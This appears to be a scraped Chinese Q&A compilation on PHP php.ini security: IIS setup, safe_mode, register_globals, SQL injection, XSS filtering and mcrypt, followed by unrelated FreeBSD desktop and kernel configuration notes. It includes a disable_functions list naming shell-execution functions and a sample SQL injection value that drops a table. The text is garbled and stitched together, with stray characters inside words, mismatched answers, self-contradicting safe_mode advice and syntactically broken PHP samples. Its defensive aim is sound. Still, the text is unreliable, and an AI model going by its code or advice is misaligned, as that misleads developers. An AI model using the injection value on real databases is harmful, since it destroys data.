phpini安全

⑴ win2008下如何快速安裝php，並做好安全設置

在Windows Server 2008下配置PHP環境特別的快，只需要滑鼠點點就可以了。

1，下載PHP5.2系列版本，目前5.2系列比5.3系列兼容性更好。其中又分為Non Thread Safe和Thread Safe版本，如果要用FastCGI模式運行PHP，就選擇Non Thread Safe版本，如果要用ISAPI模式運行PHP，就選擇Thread Safe版本悉租。

2，開啟IIS7：點擊「開始」菜單上面的「伺服器管理器」==> 角色==> 添加角色==> 點下一步==> 選上II7.5 ==> 點下一步==> 一定選上CGI ==> 開啟安裝IIS

3，雙擊下載下來的PHP安裝包，開始安裝PHP，一直點next就能完成安裝，
勾選的模塊：EXIF,GD2,Mcrypt,Mhash,Ming,Mysql,OpenSSL,SOAP,Sockets,XML-RPC,XSL,ZIP

再點next == > install 即可安裝完成


4，檢查PHP有沒有安裝成功，並且查看php.ini的存放路徑

打開 控制面板==> 管理工具==> Internet 信息服務(IIS)管理器 ，再隨意創建一個站點，按下圖進行查看：


再到該站點的目錄下，創建一個肆鏈文本文件，改名成index.php，內容是：
<?php phpinfo();>


再訪問這個站點，即可顯示PHPINFO頁面，而且要記下php.ini的存放路徑，如下圖：


5，PHP安全裂陸孫設置（重要）

打開剛才記下的php.ini的存放路徑。編輯這個文件：

在最低下加入這兩行：
disable_functions = exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source
cgi.fix_pathinfo=0

然後重啟IIS讓配置生效

⑵ php.ini中doc_root的作用是什麼

php手冊中的說明：x0dx0ax0dx0adoc_root stringx0dx0aPHP 在伺服器上的根目錄。僅在非空時使用。如果 PHP 被配置為安全模式，則此目錄之外的文件一概不被解析。如果 PHP 編譯時沒有指定 FORCE_REDIRECT，並且在任何 web 伺服器（除了 IIS）中以 CGI 方式運行 PHP，則應該設定 doc_root。替代方案是使用下面的 cgi.force_redirect 配置選項。x0dx0acgi.force_redirect booleanx0dx0a在大多數 web 伺服器中以 CGI 方式運行 PHP 時很有必要禪此用 cgi.force_redirect 提供安全。PHP 默納襲模認其為 On。可以將其關閉，但風險自擔。x0dx0a注: Windows 用戶：可以安全地在 IIS 之下將其關閉，事實上必須這洞緩么做。要在 OmniHTTPD 或 Xitami 之下使用也必須將其關閉。

⑶ 在php.ini中如何配置安全的PHP環境參數

(1) 打開php的安全模式
php的安全模式是個非常重要的內嵌的安全機制，能夠控制一些php中的函數，比如system()，
同時把很多文件操作函數進行了許可權控制，也不允許對某些關鍵文件的文件，比如/etc/passwd，
但是默認的php.ini是沒有打開安全模式的，我們把它打開：
safe_mode = on

(2) 用戶組安全
當safe_mode打開時，safe_mode_gid被關閉，那麼php腳本能夠對文件進行訪問，而且相同
組的用戶也能夠對文件進行訪問。
建議設置為：
safe_mode_gid = off
如果不進行設置，可能我們無法對我們伺服器網站目錄下的文件進行操作了，比如我們需要
對文件進行操作的時候。

⑷ PHP如何做好最基礎的安全防範

PHP如何做好最基礎的安全防範

php給了開發者極大的靈活性，但是這也為安全問題帶來了潛在的隱患，PHP如何做好最基礎的安全防範呢？下面我為大家解答一下，希望能幫到您！

當開發一個互聯網服務的時候，必須時刻牢記安全觀念，並在開發的代碼中體現。PHP腳本語言對安全問題並不關心，特別是對大多數沒有經驗的開發者來說。每當你講任何涉及到錢財事務等交易問題時，需要特別注意安全問題的考慮，例如開發一個論壇或者是一個購物車等。

安全保護一般性要點

不相信表單

對於一般的javascript前台驗證，由於無法得知用戶的行為，例如關閉了瀏覽器的javascript引擎，這樣通過POST惡意數據到伺服器。需要在伺服器端進行驗證，對每個php腳本驗證傳遞到的數據，防止XSS攻擊和SQL注入。

不相信用戶

要假設你的網站接收的每一條數據都是存在惡意代碼的，存在隱藏的威脅，要對每一條數據都進行清理

關閉全局變數

在php.ini文件中進行以下配置：

register_globals = Off

如果這個配置選項打開之後，會出現很大的安全隱患。例如有一個process.php的腳本文件，會將接收到的數據插入到資料庫，接收用戶輸入數據的表單可能如下：

< input name="username" type ="text" size = "15" maxlength = "64" >

這樣，當提交數據到process.php之後，php會注冊一個$username變數，將這個變數數據提交到process.php，同時對於任何POST或GET請求參數，都會設置這樣的變數。如果不是顯示進行初始化那麼就會出現下面的問題：

<?php

// Define $authorized = true only if user is authenticated

if

(authenticated_user()) {

$authorized = true;

}

?>

此處，假設authenticated_user函數就是判斷$authorized變數的值，如果開啟了register_globals配置，那麼任何用戶都可以發送一個請求，來設置$authorized變數的值為任意值從而就能繞過這個驗證。所有的這些提交數據都應該通過PHP預定義內置的全局數組來獲取，包括$_POST、$_GET、$_FILES、$_SERVER、$_REQUEST等，其中$_REQUEST是一個$_GET/$_POST/$_COOKIE三個數組的聯合變數，默認的順序是$_COOKIE、$_POST、$_GET。

推薦的安全配置選項

error_reporting設置為Off：不要暴露錯誤信息給用戶，開發的時候可以設置為ON

safe_mode設置為Off

register_globals設置為Off

將以下函數禁用：system、exec、passthru、shell_exec、proc_open、popen

open_basedir設置為 /tmp ，這樣可以讓session信息有存儲許可權，同時設置單獨的網站根目錄expose_php設置為Offallow_url_fopen設置為Offallow_url_include設置為Off

SQL注入攻擊

對於操作資料庫的SQL語句，需要特別注意安全性，因為用戶可能輸入特定語句使得原有的SQL語句改變了功能。類似下面的例子：

$sql ="select * from pinfo where proct = '$proct'";

此時如果用戶輸入的$proct參數為：'39'; DROP pinfo; SELECT 'FOO

那麼最終SQL語句就變成了如下的`樣子：

select proct from pinfo where proct = '39';

DROP pinfo;

SELECT 'FOO'

這樣就會變成三條SQL語句，會造成pinfo表被刪除，這樣會造成嚴重的後果。這個問題可以簡單的使用PHP的內置函數解決：

$sql = 'Select * from pinfo where proct = '"' mysql_real_escape_string($proct) . '"';

防止SQL注入攻擊需要做好兩件事：對輸入的參數總是進行類型驗證對單引號、雙引號、反引號等特殊字元總是使用mysql_real_escape_string函數進行轉義但是，這里根據開發經驗，不要開啟php的Magic Quotes，這個特性在php6中已經廢除，總是自己在需要的時候進行轉義。

防止基本的XSS攻擊

XSS攻擊不像其他攻擊，這種攻擊在客戶端進行，最基本的XSS工具就是防止一段javascript腳本在用戶待提交的表單頁面，將用戶提交的數據和cookie偷取過來。XSS工具比SQL注入更加難以防護，各大公司網站都被XSS攻擊過，雖然這種攻擊與php語言無關，但可以使用php來篩選用戶數據達到保護用戶數據的目的，這里主要使用的是對用戶的數據進行過濾，一般過濾掉HTML標簽，特別是a標簽。下面是一個普通的過濾方法：

function transform_HTML( $string , $length null) { // Helps prevent XSS attacks

// Remove dead space.

$string = trim( $string );

// Prevent potential Unicode codec problems.

$string = utf8_decode( $string );

// HTMLize HTML-specific characters.

$string = htmlentities( $string , ENT_NOQUOTES);

$string = str_replace ( "#" , "#" , $string );

$string = str_replace ( "%" , "%" , $string );

$length = intval ( $length );

if ( $length > 0) {

$string = substr ( $string , 0, $length );

}return $string ;

}

這個函數將HTML的特殊字元轉換為了HTML實體，瀏覽器在渲染這段文本的時候以純文本形式顯示。如bold會被顯示為： BoldText 上述函數的核心就是htmlentities函數，這個函數將html特殊標簽轉換為html實體字元，這樣可以過濾大部分的XSS攻擊。但是對於有經驗的XSS攻擊者，有更加巧妙的辦法進行攻擊：將他們的惡意代碼使用十六進制或者utf-8編碼，而不是普通的ASCII文本，例如可以使用下面的方式進行：

這樣瀏覽器渲染的結果其實是：

< a href = "http://host/a.php?variable=" >

< SCRIPT >Dosomethingmalicious

這樣就達到了攻擊的目的。為了防止這種情況，需要在transform_HTML函數的基礎上再將#和%轉換為他們對應的實體符號，同時加上了$length參數來限制提交的數據的最大長度。

使用SafeHTML防止XSS攻擊

上述關於XSS攻擊的防護非常簡單，但是不包含用戶的所有標記，同時有上百種繞過過濾函數提交javascript代碼的方法，也沒有辦法能完全阻止這個情況。目前，沒有一個單一的腳本能保證不被攻擊突破，但是總有相對來說防護程度更好的。一共有兩個安全防護的方式：白名單和黑名單。其中白名單更加簡單和有效。一種白名單解決方案就是SafeHTML，它足夠智能能夠識別有效的HTML，然後就可以去除任何危險的標簽。這個需要基於HTMLSax包來進行解析。安裝使用SafeHTML的方法：

1、前往http://pixel-apes.com/safehtml/?page=safehtml 下載最新的SafeHTML

2、將文件放入伺服器的classes 目錄，這個目錄包含所有的SafeHTML和HTMLSax庫

3、在自己的腳本中包含SafeHTML類文件

4、建立一個SafeHTML對象

5、使用parse方法進行過濾

<?php/* If you're storing the HTMLSax3.php in the /classes directory, along

with the safehtml.php script, define XML_HTMLSAX3 as a null string. */define(XML_HTMLSAX3, '' );// Include the class file.require_once ( 'classes/safehtml.php' );

// Define some sample bad code.

$data = This data would raise an alert

" ;// Create a safehtml object.$safehtml = new safehtml();// Parse and sanitize the data.$safe_data = $safehtml ->parse( $data );// Display result. echo 'The sanitized data is ' . $safe_data ;

?>

SafeHTML並不能完全防止XSS攻擊，只是一個相對復雜的腳本來檢驗的方式。

使用單向HASH加密方式來保護數據

單向hash加密保證對每個用戶的密碼都是唯一的，而且不能被破譯的，只有最終用戶知道密碼，系統也是不知道原始密碼的。這樣的一個好處是在系統被攻擊後攻擊者也無法知道原始密碼數據。加密和Hash是不同的兩個過程。與加密不同，Hash是無法被解密的，是單向的；同時兩個不同的字元串可能會得到同一個hash值，並不能保證hash值的唯一性。MD5函數處理過的hash值基本不能被破解，但是總是有可能性的，而且網上也有MD5的hash字典。

使用mcrypt加密數據MD5 hash函數可以在可讀的表單中顯示數據，但是對於存儲用戶的信用卡信息的時候，需要進行加密處理後存儲，並且需要之後進行解密。最好的方法是使用mcrypt模塊，這個模塊包含了超過30中加密方式來保證只有加密者才能解密數據。

<?php$data = "Stuff you want encrypted" ;

$key = "Secret passphrase used to encrypt your data" ;

$cipher = "MCRYPT_SERPENT_256" $mode = "MCRYPT_MODE_CBC" ;function encrypt( $data, $key , cipher , $mode ) {// Encrypt datareturn (string) base64_encode ( mcrypt_encrypt ( $cipher , substr (md5( $key ),0,mcrypt_get_key_size( $cipher , $mode )), $data , $mode , substr (md5( $key ),0,mcrypt_get_block_size( $cipher , $mode )) ) );

}function decrypt( $data , $key ,$cipher , $mode ) {// Decrypt data

return (string) mcrypt_decrypt ( $cipher , substr (md5( $key ),0,mcrypt_get_key_size( $cipher , $mode )), base64_decode ( $data ), $mode , substr (md5( $key ),0,mcrypt_get_block_size( $cipher , $mode )) );

}?>

mcrypt函數需要以下信息：

1、待加密數據

2、用來加密和解密數據的key

3、用戶選擇的加密數據的特定演算法（cipher：

如 MCRYPT_TWOFISH192

,MCRYPT_SERPENT_256， MCRYPT_RC2

, MCRYPT_DES

, and MCRYPT_LOKI97

）

4、用來加密的模式

5、加密的種子，用來起始加密過程的數據，是一個額外的二進制數據用來初始化加密演算法

6、加密key和種子的長度，使用mcrypt_get_key_size函數和mcrypt_get_block_size函數可以獲取如果數據和key都被盜取，那麼攻擊者可以遍歷ciphers尋找開行的方式即可，因此我們需要將加密的key進行MD5一次後保證安全性。同時由於mcrypt函數返回的加密數據是一個二進制數據，這樣保存到資料庫欄位中會引起其他錯誤，使用了base64encode將這些數據轉換為了十六進制數方便保存。

;

⑸ php.ini怎樣關閉安全模式

1.打開PHP的安全模式 2.用戶組安全 3.安全模式下樑兄執行程序主目錄 4.安全信斗模式下包含文件 5.控制PHP腳本能訪問的目錄 6.關閉危險函數 7.關閉PHP版本信息在http頭中的泄漏 8.關閉注冊全局變數 9.打開magic_quotes_gpc來防止SQL注入 10.錯橡坦襲誤信息控制 11.錯誤日誌。

⑹ 有誰知道如何安裝配置安全的freeBSD還有php.ini怎麼配置

我的FreeBSD5.3配置筆記（相同於5.4\6.0）

接觸FreeBSD時間不長，我發現配置FreeBSD對於象我這樣的新手還是很有些困難，經過幾天的研究取得了一點進展，現在我的配置方法寫出來希望新手能少走一些彎路。
1.安裝完成配置xorg,命令如下：
#Xorg -configure
這時，當前目錄下就多了一個xorg.conf.new的文件，把它cp到/etc/X11/下：
#cp xorg.conf.new /etc/X11/xorg.conf
然後，編輯xorgcfg -textmode,修改一下屏幕的解析度.

2.啟動gnome
在用戶主目錄下創建.xinitrc文件，加入以下內容：
exec gnome-session
#startx 即進入gnome

3.啟動KDE
方法1：
在用戶主目錄下創建.xinitrc文件，加入以下內容：
exec startkde

方法2：
修改一下/usr/X11R6/1ib/X11/xinit/xinitrc文件
拉到文件最後...看到..twm了嗎...從這里起..後最後前面都加#吧..
然後加上一句:
startkde

方法3：
直接輸入
# echo "/usr/local/bin/startkde" >> ~/.xinitrc 就行了

4.打開聲音
修改/boot/defaults/loader.conf
將下面兩項的NO改為YES
sound_load="NO"
snd_driver_load="NO"

5.漢化圖形界面
1.安裝kde-i18n-zh_CN:
#cd /usr/ports/chinese/kde3-i18n-zh_CN
#make install clean
2.安裝字體
在/usr/X11R6/lib/X11/fonts/下建立TrueType目錄
將windows下的SIMSUN.TTC復制到TrueType目錄
雙擊SIMSUN.TTC，字體就安裝好了
3.更改語言環境為中國，簡體中文
4.在KDE的控制中心》外觀和主題》字體 中修改字體為SIMSUN

6.安裝fcitx輸入法
1.通過ports安裝fcitx
#cd /usr/ports/chinese/fcitx
#make install
2.修改~/.xinitrc,添加:
export LANG=zh_CN.eucCN
export LC_CTYPE=zh_CN.eucCN
export XMODIFIERS='@im=fcitx'
fcitx&
exec startkde
6.#qtconfig
然後選擇-->Interface--->XIM Input Style 選Over the Spot(上面的復選框也選上)-->File--Save

7.掛載windows分區並支持中文文件名
1.建立掛載點，在/mnt/下建立文件夾C,D,E,F
2.修改/etc/fstab文件，加入windows分區，並把分區掛載到剛才建好的目錄上，設置許可權為讀寫,語言為中文並自動掛載
/dev/ad0s1 /mnt/C msdos rw,-L=zh_CN.eucCN,auto 0 0
/dev/ad0s5 /mnt/D msdos rw,-L=zh_CN.eucCN,auto 0 0
/dev/ad0s6 /mnt/E msdos rw,-L=zh_CN.eucCN,auto 0 0
/dev/ad0s7 /mnt/F msdos rw,-L=zh_CN.eucCN,auto 0 0

8.激活滑鼠滾輪
修改/etc/xorg.conf
在"Mouse"中加入
Option "ZAxisMapping" "4 5"
保存推出，重啟X。

9.調整屏幕偏移
開個終端窗口運行xvidtune，調整好之後現不要退出，點一下那個「Show」按鈕，終端窗口中會顯示幾行類似於這樣的信息：

hsync range 0: 31.50 - 48.50
vsync range 0: 40.00 - 70.00
"1024x768" 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync

打開/etc/X11/XF86Config或者xorg.conf文件，找到Section "Monitor"段，在EndSection前面加入一行：
# 這里填入上面顯示的第3行信息，前面加上ModeLine
ModeLine "1024x768" 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync

保存退出，重啟X。

FreeBSD配置：

更新FreeBSD

完成了安裝、配置，FreeBSD基本上就算裝完了。不過，目前為止沒有哪個通用操作系統能夠保證「bug-free」，FreeBSD也一樣。在重新啟動之後，我們需要做一些調整；並且，通過重新配置內核，我們可以得到一個更小、更快的操作系統。

第一步要做的是同步源代碼。FreeBSD是一套開放源代碼的操作系統，它的全部源代碼都可以通過cvsup與中央cvsup伺服器，或它的某個鏡像同步。

cvsup是一個可選的package，同樣的，它也可以從ports裡面安裝(/usr/ports/devel/cvsup和 /usr/ports/devel/cvsup-nogui)。考慮到許多應用程序都依賴X的庫文件，在前面安裝的部分我安裝了它，並且直接安裝了 cvsup的package。不過，如果你有足夠的耐心去一個一個地make需要的ports，那麼先安裝ports collection，然後make cvsup-nogui也是一個不錯的主意，盡管這需要比較長的時間。

創建一個用於cvsup(1)的supfile，命名為stable-supfile：

(default host中選定的cvsup伺服器——ftp.bjpu.e.cn對訪問的IP進行了限制，筆者只在北京工業大學校內使用過，因此如果您無法連接這個伺服器，請嘗試www.cn.freebsd.org，或cvsup.freebsd.org)

*default host=ftp.bjpu.e.cn
*default base=/usr
*default prefix=/usr
*default release=cvs tag=RELENG_4
*default delete use-rel-suffix
src-all
ports-all tag=.

隨後執行

cvsup -g -L 2 stable-supfile

這里需要稍微解釋一下FreeBSD的幾種版本。

FreeBSD包括3類分支：-RELEASE，-STABLE和-CURRENT。FreeBSD 3.x、4.x和5.0是目前受到維護的版本，如果你期待穩定運行，那麼，可以選擇的最新版本將是FreeBSD 4.6-STABLE(如果你是在4.6.2-RELEASE發行之後更新的，那麼它實際上比4.6.2-RELEASE新，並且，它正式的CVS tag是RELENG_4，即FreeBSD 4-STABLE)。

那麼，三類分支有什麼區別呢？

FreeBSD的開發是非常活躍的。系統中可能會隨時引入一些新的特性。最新的代碼是在-CURRENT分支中引入的。-CURRENT的修改非常頻繁，每天都可能有數百處修改。使用-CURRENT分支的FreeBSD需要耐心和勇氣，因為你的系統隨時可能崩潰(隨著FreeBSD 5.0開發尾聲的接近，這種現象已經越來越少)，make world也可能空手而歸(沒有人保證-CURRENT分支能夠正常編譯)，此外，這個分支的性能也不好(因為調試的原因，這個分支引入了大量的調試選項，這意味著運行速度不會太快)。當然，正像它的名字那樣，-CURRENT分支的版本也是最新的5.0，而且，一切FreeBSD的錯誤和漏洞的修正都是首先在-CURRENT分支引入的。目前，-CURRENT分支碩果僅存的只有FreeBSD 5-CURRENT(指定cvs tag時寫「.」)，這個分支包括了FreeBSD 5.0開發的最新進展。

FreeBSD 5中將引入大量的新特性，包括核心級線程(目前FreeBSD中的線程支持僅限於用戶級線程，這在多處理器的環境下性能不夠好，當然，目前使用fork ()來支持的多進程線程模擬能夠提供類似核心級線程的功能，但並不是所有的程序員都知道如何使用fork)、完整的Soft Updates(這一變化將提供更好的文件系統性能，同時提供更好的穩定性)，等等。如果你有快速的Internet連接，一台或一些空餘的機器(當然，不是生產用的伺服器)，並且希望為FreeBSD的開發作貢獻，或者你關心操作系統的最新發展，那麼，-CURRENT分支是最好的選擇。此外，

由於-CURRENT分支性能不好、穩定性不夠等這些缺點，對於生產的伺服器來說，通常運行的應該是FreeBSD-STABLE。如同它的名字那樣， FreeBSD-STABLE的目的是「穩定地運行」。-CURRENT分支中的代碼，在經過一段時間(通常是7到90天，但安全更新屬於特例，通常會在幾個小時)的驗證之後，符合版本條件(有些新特性只能用於FreeBSD 5.0)的代碼會被FreeBSD-STABLE吸收，這個操作稱作MFC(Merge From -CURRENT，不是Microsoft Foundation Classes:P)。

由於FreeBSD 5.0的第一個RELEASE至今仍然沒有發布，因此，目前還沒有5.0-STABLE。目前，FreeBSD-STABLE有兩個版本，FreeBSD 3-STABLE和FreeBSD 4-STABLE，分別對應3.x和4.x的最新穩定版代碼(對應的cvs tag分別是RELENG_3和RELENG_4)。由於版本的更新換代，其中3.x的-STABLE正在逐漸消亡。FreeBSD-STABLE每天平均會修改10個左右的文件。

每隔一段時間，FreeBSD的發行工程組(Release Engineering Team)會對FreeBSD-STABLE的源代碼樹進行鎖定。這段時間(目前的規定是30天，之前還有30天准備)內，所有的MFC操作都需要發行工程組的批准，因此，FreeBSD-STABLE在這個階段基本不會引入任何新的特性。經過這段時間之後，發行工程組會在最後鎖定ports樹，並 build一份所有的package，之後，這份鎖定的-STABLE，可能經過若干RC(Release Candidate)，被命名為RELEASE，並製作光碟發行。

顧名思義，-RELEASE的設計目標是「發行」。一個版本一旦RELEASE，那麼他的功能就不會再增加了。此後的所有維護的目標都只有一個，那就是絕對穩定。如果你和-RELEASE分支同步，那麼絕不會出現make無法通過的情況，而且，通常這也可以保證你的系統「絕對」穩定，因為它不會引入任何新功能(例如，4.6就是4.6，如果你想要4.6.2的功能，必須明確地指定4.6.2)。

目前，FreeBSD有很多RELEASE版本，它們的cvs tag如下。我個人建議使用最新的4.6.2-RELEASE。

對於多數人來說，-RELEASE是一個比較極端的選擇。無論何時出現版本升級，如果你想跟進，那都必須修改supfile，如果你選擇不跟進，那麼就可能造成ports工作異常。如果經常更新，-RELEASE可以保證操作系統本身的安全性，但同其他分支一樣，如果ports出了問題，那麼也得一塊 make，而既然這樣，還不如使用-STABLE。

如果你符合下面的條件，那麼RELEASE分支可能比-STABLE分支更適合你

* 你使用的軟體對於操作系統的變化非常敏感，比如，它只能FreeBSD 4.5，而無法在4.6上運行；同時，你不打算採用它的更新版本，或者它的作者拒絕更新
* 操作系統的更新對於你來說沒有任何意義，比如，你打算把FreeBSD當作一個相對固定的嵌入式操作系統來使用，例如，作為防火牆的一部分
* 更新會對你造成困擾，操作系統的絕大多數新特性對於你來說除了增加煩惱之外，不能帶來任何其他東西。

-並且，符合以下的全部條件-

* 你每天察看FreeBSD，以及使用的全部軟體的安全公告
* 你的Internet連接比較通暢

目前我本人維護的所有主機，除了作為防火牆的那台之外，使用的都是FreeBSD-STABLE。

一旦同步完源代碼，就應該對整個系統進行更新。如果你沒有每天察看安全公告的習慣，那就應該關心一下cvsup到底更新了哪些代碼。nectar是目前 FreeBSD的Security Officer。如果你發現他一下子更新了許多代碼，那麼對你來說立即make world和kernel很可能是必需的。

為了更新整個系統，在/usr/src中執行

make world

以及

make kernel KERNCONF=內核配置文件名

當然，也可以連起來執行：

make world kernel KERNCONF=內核配置文件名

如果你的計算機運行速度較慢，那麼，對於基本系統的更新(相當於不包括庫的一次world)，可以用

make most

替代make world，但make world是一個不錯的主意，因為它能夠保證對C運行環境的改變應用到所有的程序中，如果修正的不是動態連接的C函數庫，那麼make world可以保證代碼的一致性。

make kernel是一個需要重新啟動的操作。如果你的make world修改了系統的關鍵服務，那麼最好也重新啟動一下。我很少有耐心看完make world和kernel的執行，根據系統的運行速度不同，這需要一個小時到一天的時間，而且，不是所有的SSH客戶端都能夠長時間正確的執行，例如， SecureCRT的多個版本都有內存泄漏問題。

為了解決這個問題，我用下面的命令來完成更新：

make world kernel KERNCONF=內核配置文件名 clean > /var/log/world,out && reboot &

這個命令能夠記錄更新的全過程，如果在什麼地方編譯失敗，你可以很快地找到原因。對於多數人來說，由於後面的&&，只需要察看uptime就能知道便以是否成功。

需要說明的是，FreeBSD的make world並不總能成功。有時需要修改一些環境變數才能成功完成make。為了保證make成功，在/usr/src中執行任何make操作之前，建議你看一眼UPDATING中是否有特殊的要求(這種要求並不是在FreeBSD Release的時候才會出現，很多時候他會在某個CURRENT中引入，然後隨著MFC進入-STABLE分支)，並且，在進行大的版本升級之前(跨 RELEASE，甚至主版本號)，首先執行下面的命令

mergemaster -p

並在make world之後執行

mergemaster -i

運行mergemaster腳本需要一定的Unix配置知識，不過，由於配置文件中包含很多幫助信息，因此，只要master.passwd、group 這樣的文件不出大問題(如果cvsup更新了master.passwd，那麼就需要留神，因為master.passwd標准配置是root口令為空，這時需要用m來合並，而不是使用i安裝)，mergemaster並不會引入什麼新的問題。

前一條命令是更新make的配置(/etc/defaults/make.conf和/etc/make.conf)。對於多數人來說，除非進行跨版本升級，否則一般情況下是不需要這樣做的。後一條命令是同步全部配置，並安裝以前不存在的配置文件，而不進行提示。

筆者曾經遇到過FreeBSD因為系統日期不正確而無法make的情況，因此，再次特別提醒大家，如果你的系統日期不正確，最好是用date命令修改一下，或者乾脆用ntpdate或ntpd來同步時間。關於如何使用ntp，將在以後說明。

以後我們將講解FreeBSD內核的配置，以及如何配置make.conf來優化FreeBSD的編譯結果。

「簡單的東西不容易出問題。」

至理名言！事實上，削減操作系統中那些對你沒用的功能是一件非常重要的事情。這不僅僅意味著一個更小的操作系統，佔用更少的磁碟空間(現在的硬碟少說也有幾十GB，幾兆的空間根本就是九牛一毛)，而且意味著你被攻擊的可能性也更低——簡而言之，你不需要擔心操作系統中沒有安裝的模塊存在問題會對你造成影響。

這篇文章中，我們將一起對FreeBSD-i386的內核進行優化配置。這篇文章是針對FreeBSD4.7-STABLE寫的，並且，FreeBSD 4.x的配置不會和這篇文章有太大出入。如果你要優化FreeBSD 5或FreeBSD 2/3的內核的話，則需要仔細參考它們的LINT文件了(後面將會提到)。

[注意：FreeBSD 5.0預定將於2002年11月20日發布。FreeBSD的開發組非常重視發行版本的質量，並認為這比發行版本的計劃還重要，但由於同樣的原因，我們往往會發現FreeBSD實際發行的版本比預定計劃晚一些，通常在半個月之內。FreeBSD 5.0作為FreeBSD近期最為重要的發行版本，很可能也會延後發表，但筆者個人認為無論如何我們在今年年底之前肯定是可以看到最終的發行版本的。 FreeBSD 5.0對系統進行了大量的修改，這一系列的文章將在FreeBSD 5.0發布當天發表針對5.0的修訂版本，而現有版本將保留，但進入維護階段，不再引入新的內容。]

FreeBSD的源代碼可以直接從中央cvsup伺服器同步，也可以作為系統的一部分在安裝的時候一兵裝上。前面已經說過如何同步源代碼，在此不再贅述。 FreeBSD的源代碼(通常在/usr/src)包含建造基本系統的全部代碼，而在/usr/src/sys中則有若干個目錄，對應不同的計算機體系結構(4.x只支持i386和alpha)。i386是一個泛指的名字，包含了與Intel 80386兼容的所有機器，並不是特指80386。

簡單介紹一下FreeBSD的內核文件。在4.x系統中，/kernel這個文件是默認的內核，通常正常啟動使用的就是它。 /kernel.GENERIC這個文件是兼容性較強的內核，如果/kernel無法引導系統，就得靠這個文件來引導。/kernel.old是本次make kernel之前的內核，通常如果你的kernel壞掉，也可以考慮使用/kernel.old來引導系統。

/moles/是內核的模塊，而/moles.old/是對應/kernel.old的模塊。這些文件在每次替換kernel的時候都會同時替換。

在5.0中，內核以及內核的模塊都被保存在/boot/kernel中。

在/usr/src/sys/i386/conf中有兩個配置文件，GENERIC和LINT。其中GENERIC是make kernel的默認配置文件，直接make kernel生成的是GENERIC內核，但安裝時命名為/kernel。系統在安裝時會安裝一個kernel.GENERIC，以後，這個文件不會跟隨系統的make kernel更新，因此，如果你認為這個文件有必要更新的話，需要手工make kernel，並把/kernel改名為kernel.GENERIC。當然，通常並不需要這樣做。

LINT是包括幾乎所有內核編譯配置詳細信息的文件。這個配置並不是用來真正建立kernel的，他的主要用途是向用戶展示可用的內核編譯配置。在修改內核編譯配置時，最好先參考這個文件。

為了配置自己的內核，應將GENERIC復制為一個另外的文件。習慣上這個文件和主機名相同。例如，我把自己的這台Web機器命名為apache.intranet.frontfree.net，就把配置文件命名為APACHE：

cd /usr/src/sys/i386/conf
cp GENERIC APACHE

隨後，用ee APACHE編輯它。我們拿一個實際的GENERIC文件來說明。

為了節省篇幅，這個文件頭上的注釋被刪掉了一部分。
machine i386 # 體系模型為i386
cpu I386_CPU # 支持80386
cpu I486_CPU # 支持80486
cpu I586_CPU # 支持Pentium
cpu I686_CPU # 支持Pentium Pro以及更高
ident GENERIC # 內核文件的名字
maxusers 0 # 自動檢測同時允許的最大用戶數

#makeoptions DEBUG=-g # 包含調試符號。通常只有current版本打開
options MATH_EMULATE #支持協處理器模擬
options INET #支持互聯網
options INET6 #IPv6通訊協議
options FFS #伯克利快速文件系統
options FFS_ROOT #FFS作為根設備[必須保留]
options SOFTUPDATES #打開FFS soft updates支持
options UFS_DIRHASH #提高大型目錄的支持
options MFS #內存文件系統
options MD_ROOT #MD作為根設備
options NFS #Network Filesystem
options NFS_ROOT #NFS作為根設備(需要NFS)
options MSDOSFS #MSDOS文件系統
options CD9660 #ISO 9660文件系統(光碟)
options CD9660_ROOT #CD-ROM作為根設備(需要CD9660)
options PROCFS #進程文件系統
options COMPAT_43 #兼容4.3BSD[必須保留]
options SCSI_DELAY=15000 #檢測SCSI設備前的延時(ms)
options UCONSOLE #用戶可以奪取控制台
options USERCONFIG #boot -c編輯器 editor
options VISUAL_USERCONFIG #菜單式boot -c編輯器
options KTRACE #ktrace(1)支持
options SYSVSHM #SYSV-風格的共享內存
options SYSVMSG #SYSV-風格的消息隊列
options SYSVSEM #SYSV-風格的信號量(semaphores)
options P1003_1B #Posix P1003_1B實時擴展
options _KPOSIX_PRIORITY_SCHEDULING
options ICMP_BANDLIM #對惡意ICMP請求進行限制
options KBD_INSTALL_CDEV # 在/dev安裝一個CDEV設備

# 下面兩項在製作對稱多處理器(SMP)內核時需要
#options SMP #對稱多處理器內核
#options APIC_IO #對稱(APIC) I/O

device isa
device eisa
device pci

# 軟碟機
device fdc0 at isa? port IO_FD1 irq 6 drq 2
device fd0 at fdc0 drive 0
device fd1 at fdc0 drive 1
#
# 如果使用東芝Libretto以及他的Y-E Y-E Data PCMCIA軟碟機
# 不要使用上面的fdc0，而應使用
#device fdc0

# ATA以及ATAPI設備
device ata0 at isa? port IO_WD1 irq 14
device ata1 at isa? port IO_WD2 irq 15
device ata
device atadisk # ATA 磁碟驅動器(IDE硬碟)
device atapicd # ATAPI 光碟機
device atapifd # ATAPI 軟碟機
device atapist # ATAPI 磁帶機
options ATA_STATIC_ID #靜態設備編號

# SCSI控制器
device ahb # EISA AHA1742 family
device ahc # AHA2940 板載AIC7xxx設備
device amd # AMD 53C974 (Tekram DC-390(T))
device isp # Qlogic family
device ncr # NCR/Symbios Logic
device sym # NCR/Symbios Logic (較新的晶元組)
options SYM_SETUP_LP_PROBE_MAP=0x40
# 使用ncr可以在配置了sym和ncr的情況下掛接舊的NCR設備

device adv0 at isa?
device adw
device bt0 at isa?
device aha0 at isa?
device aic0 at isa?

device ncv # NCR 53C500
device nsp # Workbit Ninja SCSI-3
device stg # TMC 18C30/18C50

# SCSI 外設
device scbus # SCSI 匯流排(如果使用SCSI設備，必須有)
device da # Direct Access (硬碟)
device sa # Sequential Access (磁帶，等等)
device cd # CD
device pass # Passthrough device (直接 SCSI 訪問)

# 通過SCSI子系統介面的RAID控制器
device asr # DPT SmartRAID V, VI and Adaptec SCSI RAID
device dpt # DPT Smartcache - See LINT for options!
device iir # Intel Integrated RAID
device mly # Mylex AcceleRAID/eXtremeRAID
device ciss # Compaq SmartRAID 5* series

# RAID控制器
device aac # Adaptec FSA RAID, Dell PERC2/PERC3
device aacp # SCSI passthrough for aac (requires CAM)
device ida # Compaq Smart RAID
device amr # AMI MegaRAID
device mlx # Mylex DAC960 family
device twe # 3ware Escalade

# atkbdc0 控制鍵盤和PS/2滑鼠
device atkbdc0 at isa? port IO_KBD
